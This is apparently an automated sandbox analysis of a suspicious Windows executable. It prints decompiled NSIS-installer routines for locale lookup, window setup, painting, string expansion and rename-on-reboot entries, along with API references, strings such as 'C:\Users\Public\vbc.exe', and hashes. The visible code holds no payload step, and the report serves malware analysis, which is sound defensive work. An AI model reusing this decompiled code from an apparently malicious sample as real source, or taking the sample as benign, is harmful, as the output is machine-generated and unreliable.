                              					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
                              					__eflags =  *0x420d50;
                              					if(__eflags == 0) {
                              						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
                              					}
                              					lstrcatA("1033", _t74);
                              				} else {
                              					E00406186("1033",  *_t17() & 0x0000ffff);
                              				}
                              				E00403D00(_t71, _t84);
                              				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                              				 *0x4247e0 =  *0x42475c & 0x00000020;
                              				 *0x4247fc = 0x10000;
                              				if(E00405CAE(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
                              					L16:
                              					if(E00405CAE(_t92, _t80) == 0) {
                              						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                              					}
                              					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040);
                              					 *0x423f28 = _t25;
                              					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                              						L21:
                              						if(E0040140B(0) == 0) {
                              							_t27 = E00403D00(_t71, __eflags);
                              							__eflags =  *0x424800;
                              							if( *0x424800 != 0) {
                              								_t28 = E00405421(_t27, 0);
                              								__eflags = _t28;
                              								if(_t28 == 0) {
                              									E0040140B(1);
                              									goto L33;
                              								}
                              								__eflags =  *0x423f0c; // 0x0
                              								if(__eflags == 0) {
                              									E0040140B(2);
                              								}
                              								goto L22;
                              							}
                              							ShowWindow( *0x420d30, 5);
                              							_t34 = E004065C3("RichEd20");
                              							__eflags = _t34;
                              							if(_t34 == 0) {
                              								E004065C3("RichEd32");
                              							}
                              							_t81 = "RichEdit20A";
                              							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
                              							__eflags = _t35;
                              							if(_t35 == 0) {
                              								GetClassInfoA(0, "RichEdit", 0x423ee0);
                              								 *0x423f04 = _t81;
                              								RegisterClassA(0x423ee0);
                              							}
                              							_t36 =  *0x423f20; // 0x0
                              							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
                              							E0040398B(E0040140B(5), 1);
                              							return _t39;
                              						}
                              						L22:
                              						_t31 = 2;
                              						return _t31;
                              					} else {
                              						_t71 =  *0x424740;
                              						 *0x423ee4 = E00401000;
                              						 *0x423ef0 =  *0x424740;
                              						 *0x423ef4 = _t25;
                              						 *0x423f04 = 0x40a210;
                              						if(RegisterClassA(0x423ee0) == 0) {
                              							L33:
                              							__eflags = 0;
                              							return 0;
                              						}
                              						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                              						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
                              						goto L21;
                              					}
                              				} else {
                              					_t71 =  *(_t76 + 0x48);
                              					_t86 = _t71;
                              					if(_t71 == 0) {
                              						goto L16;
                              					}
                              					_t74 = 0x4236e0;
                              					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
                              					_t57 =  *0x4236e0; // 0x75
                              					if(_t57 == 0) {
                              						goto L16;
                              					}
                              					if(_t57 == 0x22) {
                              						_t74 = 0x4236e1;
                              						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
                              					}
                              					_t59 = lstrlenA(_t74) + _t74 - 4;
                              					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                              						L15:
                              						E00406228(_t80, E00405BC0(_t74));
                              						goto L16;
                              					} else {
                              						_t63 = GetFileAttributesA(_t74);
                              						if(_t63 == 0xffffffff) {
                              							L14:
                              							E00405C07(_t74);
                              							goto L15;
                              						}
                              						_t92 = _t63 & 0x00000010;
                              						if((_t63 & 0x00000010) != 0) {
                              							goto L15;
                              						}
                              						goto L14;
                              					}
                              				}
                              			}


























                              APIs
                                • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                              • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403AB6
                              • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
                              • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                              • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
                                • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                              • RegisterClassA.USER32(00423EE0), ref: 00403BCF
                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                              • CreateWindowExA.USER32 ref: 00403C1C
                              • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423EE0), ref: 00403C7E
                              • GetClassInfoA.USER32(00000000,RichEdit,00423EE0), ref: 00403C8B
                              • RegisterClassA.USER32(00423EE0), ref: 00403C94
                              • DialogBoxParamA.USER32 ref: 00403CB3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
                              • API String ID: 1975747703-2442209702
                              • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                              • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                              • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                              • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                              				char _v8;
                              				signed int _v12;
                              				void* _v16;
                              				struct HWND__* _t52;
                              				long _t86;
                              				int _t98;
                              				struct HWND__* _t99;
                              				signed int _t100;
                              				signed int _t106;
                              				intOrPtr _t107;
                              				intOrPtr _t109;
                              				int _t110;
                              				signed int* _t112;
                              				signed int _t113;
                              				char* _t114;
                              				CHAR* _t115;
                              
                              				if(_a8 != 0x110) {
                              					__eflags = _a8 - 0x111;
                              					if(_a8 != 0x111) {
                              						L11:
                              						__eflags = _a8 - 0x4e;
                              						if(_a8 != 0x4e) {
                              							__eflags = _a8 - 0x40b;
                              							if(_a8 == 0x40b) {
                              								 *0x41fd1c =  *0x41fd1c + 1;
                              								__eflags =  *0x41fd1c;
                              							}
                              							L25:
                              							_t110 = _a16;
                              							L26:
                              							return E00404313(_a8, _a12, _t110);
                              						}
                              						_t52 = GetDlgItem(_a4, 0x3e8);
                              						_t110 = _a16;
                              						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                              							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                              							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                              								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                              								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                              								_v12 = _t100;
                              								__eflags = _t100 - _t109 - 0x800;
                              								_v16 = _t109;
                              								_v8 = 0x4236e0;
                              								if(_t100 - _t109 < 0x800) {
                              									SendMessageA(_t52, 0x44b, 0,  &_v16);
                              									SetCursor(LoadCursorA(0, 0x7f02));
                              									_push(1);
                              									_t40 =  &_v8; // 0x4236e0
                              									E004046BB(_a4,  *_t40);
                              									SetCursor(LoadCursorA(0, 0x7f00));
                              									_t110 = _a16;
                              								}
                              							}
                              						}
                              						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                              						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                              							goto L26;
                              						} else {
                              							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                              							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                              								goto L26;
                              							}
                              							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                              								SendMessageA( *0x424748, 0x111, 1, 0);
                              							}
                              							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                              								SendMessageA( *0x424748, 0x10, 0, 0);
                              							}
                              							return 1;
                              						}
                              					}
                              					__eflags = _a12 >> 0x10;
                              					if(_a12 >> 0x10 != 0) {
                              						goto L25;
                              					}
                              					__eflags =  *0x41fd1c; // 0x0
                              					if(__eflags != 0) {
                              						goto L25;
                              					}
                              					_t112 =  *0x420528 + 0x14;
                              					__eflags =  *_t112 & 0x00000020;
                              					if(( *_t112 & 0x00000020) == 0) {
                              						goto L25;
                              					}
                              					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                              					__eflags = _t106;
                              					 *_t112 = _t106;
                              					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                              					E00404697();
                              					goto L11;
                              				} else {
                              					_t98 = _a16;
                              					_t113 =  *(_t98 + 0x30);
                              					if(_t113 < 0) {
                              						_t107 =  *0x423f1c; // 0x5f57f6
                              						_t113 =  *(_t107 - 4 + _t113 * 4);
                              					}
                              					_push( *((intOrPtr*)(_t98 + 0x34)));
                              					_t114 = _t113 +  *0x424798;
                              					_push(0x22);
                              					_a16 =  *_t114;
                              					_v12 = _v12 & 0x00000000;
                              					_t115 = _t114 + 1;
                              					_v16 = _t115;
                              					_v8 = E004043E2;
                              					E004042AC(_a4);
                              					_push( *((intOrPtr*)(_t98 + 0x38)));
                              					_push(0x23);
                              					E004042AC(_a4);
                              					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                              					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                              					_t99 = GetDlgItem(_a4, 0x3e8);
                              					E004042E1(_t99);
                              					SendMessageA(_t99, 0x45b, 1, 0);
                              					_t86 =  *( *0x424754 + 0x68);
                              					if(_t86 < 0) {
                              						_t86 = GetSysColor( ~_t86);
                              					}
                              					SendMessageA(_t99, 0x443, 0, _t86);
                              					SendMessageA(_t99, 0x445, 0, 0x4010000);
                              					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                              					 *0x41fd1c = 0;
                              					SendMessageA(_t99, 0x449, _a16,  &_v16);
                              					 *0x41fd1c = 0;
                              					return 0;
                              				}
                              			}




















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: N$6B
                              • API String ID: 3103080414-649610290
                              • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                              • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                              • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                              • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405E97(void* __ecx) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				long _t12;
                              				long _t24;
                              				char* _t31;
                              				int _t37;
                              				void* _t38;
                              				intOrPtr* _t39;
                              				long _t42;
                              				CHAR* _t44;
                              				void* _t46;
                              				void* _t48;
                              				void* _t49;
                              				void* _t52;
                              				void* _t53;
                              
                              				_t38 = __ecx;
                              				_t44 =  *(_t52 + 0x14);
                              				 *0x422ae0 = 0x4c554e;
                              				if(_t44 == 0) {
                              					L3:
                              					_t2 = _t52 + 0x1c; // 0x422ee0
                              					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
                              					if(_t12 != 0 && _t12 <= 0x400) {
                              						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
                              						_t53 = _t52 + 0x10;
                              						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
                              						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
                              						_t48 = _t12;
                              						 *(_t53 + 0x18) = _t48;
                              						if(_t48 != 0xffffffff) {
                              							_t42 = GetFileSize(_t48, 0);
                              							_t6 = _t37 + 0xa; // 0xa
                              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                              							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
                              								L18:
                              								return CloseHandle(_t48);
                              							} else {
                              								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
                              									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
                              									if(_t49 == 0) {
                              										_t48 =  *(_t53 + 0x18);
                              										L16:
                              										_t24 = _t42;
                              										L17:
                              										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
                              										SetFilePointer(_t48, 0, 0, 0);
                              										E00405E68(_t48, _t46, _t42 + _t37);
                              										GlobalFree(_t46);
                              										goto L18;
                              									}
                              									_t39 = _t46 + _t42;
                              									_t31 = _t39 + _t37;
                              									while(_t39 > _t49) {
                              										 *_t31 =  *_t39;
                              										_t31 = _t31 - 1;
                              										_t39 = _t39 - 1;
                              									}
                              									_t24 = _t49 - _t46 + 1;
                              									_t48 =  *(_t53 + 0x18);
                              									goto L17;
                              								}
                              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                              								_t42 = _t42 + 0xa;
                              								goto L16;
                              							}
                              						}
                              					}
                              				} else {
                              					CloseHandle(E00405DC1(_t44, 0, 1));
                              					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
                              					if(_t12 != 0 && _t12 <= 0x400) {
                              						goto L3;
                              					}
                              				}
                              				return _t12;
                              			}




















                              APIs
                              • CloseHandle.KERNEL32(00000000), ref: 00405EC8
                              • GetShortPathNameA.KERNEL32 ref: 00405ED1
                                • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                              • GetShortPathNameA.KERNEL32 ref: 00405EEE
                              • wsprintfA.USER32 ref: 00405F0C
                              • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                              • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                              • GlobalFree.KERNEL32(00000000), ref: 00405FF5
                              • CloseHandle.KERNEL32(00000000), ref: 00405FFC
                                • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
                                • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %s=%s$[Rename]$*B$.B$.B
                              • API String ID: 2171350718-3836630945
                              • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                              • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                              • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                              • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                              				struct tagLOGBRUSH _v16;
                              				struct tagRECT _v32;
                              				struct tagPAINTSTRUCT _v96;
                              				struct HDC__* _t70;
                              				struct HBRUSH__* _t87;
                              				struct HFONT__* _t94;
                              				long _t102;
                              				signed int _t126;
                              				struct HDC__* _t128;
                              				intOrPtr _t130;
                              
                              				if(_a8 == 0xf) {
                              					_t130 =  *0x424754;
                              					_t70 = BeginPaint(_a4,  &_v96);
                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                              					_a8 = _t70;
                              					GetClientRect(_a4,  &_v32);
                              					_t126 = _v32.bottom;
                              					_v32.bottom = _v32.bottom & 0x00000000;
                              					while(_v32.top < _t126) {
                              						_a12 = _t126 - _v32.top;
                              						asm("cdq");
                              						asm("cdq");
                              						asm("cdq");
                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                              						_t87 = CreateBrushIndirect( &_v16);
                              						_v32.bottom = _v32.bottom + 4;
                              						_a16 = _t87;
                              						FillRect(_a8,  &_v32, _t87);
                              						DeleteObject(_a16);
                              						_v32.top = _v32.top + 4;
                              					}
                              					if( *(_t130 + 0x58) != 0xffffffff) {
                              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                              						_a16 = _t94;
                              						if(_t94 != 0) {
                              							_t128 = _a8;
                              							_v32.left = 0x10;
                              							_v32.top = 8;
                              							SetBkMode(_t128, 1);
                              							SetTextColor(_t128,  *(_t130 + 0x58));
                              							_a8 = SelectObject(_t128, _a16);
                              							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
                              							SelectObject(_t128, _a8);
                              							DeleteObject(_a16);
                              						}
                              					}
                              					EndPaint(_a4,  &_v96);
                              					return 0;
                              				}
                              				_t102 = _a16;
                              				if(_a8 == 0x46) {
                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                              					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
                              				}
                              				return DefWindowProcA(_a4, _a8, _a12, _t102);
                              			}














                              APIs
                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32 ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                              • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                              • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                              • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                              				struct _ITEMIDLIST* _v8;
                              				char _v12;
                              				signed int _v16;
                              				signed char _v20;
                              				signed int _v24;
                              				signed char _v28;
                              				signed int _t38;
                              				CHAR* _t39;
                              				signed int _t41;
                              				char _t52;
                              				char _t53;
                              				char _t55;
                              				char _t57;
                              				void* _t65;
                              				char* _t66;
                              				signed int _t80;
                              				intOrPtr _t86;
                              				char _t88;
                              				void* _t89;
                              				CHAR* _t90;
                              				void* _t92;
                              				signed int _t97;
                              				signed int _t99;
                              				void* _t100;
                              
                              				_t92 = __esi;
                              				_t89 = __edi;
                              				_t65 = __ebx;
                              				_t38 = _a8;
                              				if(_t38 < 0) {
                              					_t86 =  *0x423f1c; // 0x5f57f6
                              					_t38 =  *(_t86 - 4 + _t38 * 4);
                              				}
                              				_push(_t65);
                              				_push(_t92);
                              				_push(_t89);
                              				_t66 = _t38 +  *0x424798;
                              				_t39 = 0x4236e0;
                              				_t90 = 0x4236e0;
                              				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
                              					_t90 = _a4;
                              					_a4 = _a4 & 0x00000000;
                              				}
                              				while(1) {
                              					_t88 =  *_t66;
                              					if(_t88 == 0) {
                              						break;
                              					}
                              					__eflags = _t90 - _t39 - 0x400;
                              					if(_t90 - _t39 >= 0x400) {
                              						break;
                              					}
                              					_t66 = _t66 + 1;
                              					__eflags = _t88 - 4;
                              					_a8 = _t66;
                              					if(__eflags >= 0) {
                              						if(__eflags != 0) {
                              							 *_t90 = _t88;
                              							_t90 =  &(_t90[1]);
                              							__eflags = _t90;
                              						} else {
                              							 *_t90 =  *_t66;
                              							_t90 =  &(_t90[1]);
                              							_t66 = _t66 + 1;
                              						}
                              						continue;
                              					}
                              					_t41 =  *((char*)(_t66 + 1));
                              					_t80 =  *_t66;
                              					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                              					_v24 = _t80;
                              					_v28 = _t80 | 0x00000080;
                              					_v16 = _t41;
                              					_v20 = _t41 | 0x00000080;
                              					_t66 = _a8 + 2;
                              					__eflags = _t88 - 2;
                              					if(_t88 != 2) {
                              						__eflags = _t88 - 3;
                              						if(_t88 != 3) {
                              							__eflags = _t88 - 1;
                              							if(_t88 == 1) {
                              								__eflags = (_t41 | 0xffffffff) - _t97;
                              								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                              							}
                              							L42:
                              							_t90 =  &(_t90[lstrlenA(_t90)]);
                              							_t39 = 0x4236e0;
                              							continue;
                              						}
                              						__eflags = _t97 - 0x1d;
                              						if(_t97 != 0x1d) {
                              							__eflags = (_t97 << 0xa) + 0x425000;
                              							E00406228(_t90, (_t97 << 0xa) + 0x425000);
                              						} else {
                              							E00406186(_t90,  *0x424748);
                              						}
                              						__eflags = _t97 + 0xffffffeb - 7;
                              						if(_t97 + 0xffffffeb < 7) {
                              							L33:
                              							E00406503(_t90);
                              						}
                              						goto L42;
                              					}
                              					_t52 =  *0x42474c;
                              					__eflags = _t52;
                              					_t99 = 2;
                              					if(_t52 >= 0) {
                              						L13:
                              						_a8 = 1;
                              						L14:
                              						__eflags =  *0x4247e4;
                              						if( *0x4247e4 != 0) {
                              							_t99 = 4;
                              						}
                              						__eflags = _t80;
                              						if(__eflags >= 0) {
                              							__eflags = _t80 - 0x25;
                              							if(_t80 != 0x25) {
                              								__eflags = _t80 - 0x24;
                              								if(_t80 == 0x24) {
                              									GetWindowsDirectoryA(_t90, 0x400);
                              									_t99 = 0;
                              								}
                              								while(1) {
                              									__eflags = _t99;
                              									if(_t99 == 0) {
                              										goto L30;
                              									}
                              									_t53 =  *0x424744;
                              									_t99 = _t99 - 1;
                              									__eflags = _t53;
                              									if(_t53 == 0) {
                              										L26:
                              										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                              										__eflags = _t55;
                              										if(_t55 != 0) {
                              											L28:
                              											 *_t90 =  *_t90 & 0x00000000;
                              											__eflags =  *_t90;
                              											continue;
                              										}
                              										__imp__SHGetPathFromIDListA(_v8, _t90);
                              										_v12 = _t55;
                              										__imp__CoTaskMemFree(_v8);
                              										__eflags = _v12;
                              										if(_v12 != 0) {
                              											goto L30;
                              										}
                              										goto L28;
                              									}
                              									__eflags = _a8;
                              									if(_a8 == 0) {
                              										goto L26;
                              									}
                              									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                              									__eflags = _t57;
                              									if(_t57 == 0) {
                              										goto L30;
                              									}
                              									goto L26;
                              								}
                              								goto L30;
                              							}
                              							GetSystemDirectoryA(_t90, 0x400);
                              							goto L30;
                              						} else {
                              							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
                              							__eflags =  *_t90;
                              							if( *_t90 != 0) {
                              								L31:
                              								__eflags = _v16 - 0x1a;
                              								if(_v16 == 0x1a) {
                              									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                              								}
                              								goto L33;
                              							}
                              							E004062BB(_t66, _t90, _t99, _t90, _v16);
                              							L30:
                              							__eflags =  *_t90;
                              							if( *_t90 == 0) {
                              								goto L33;
                              							}
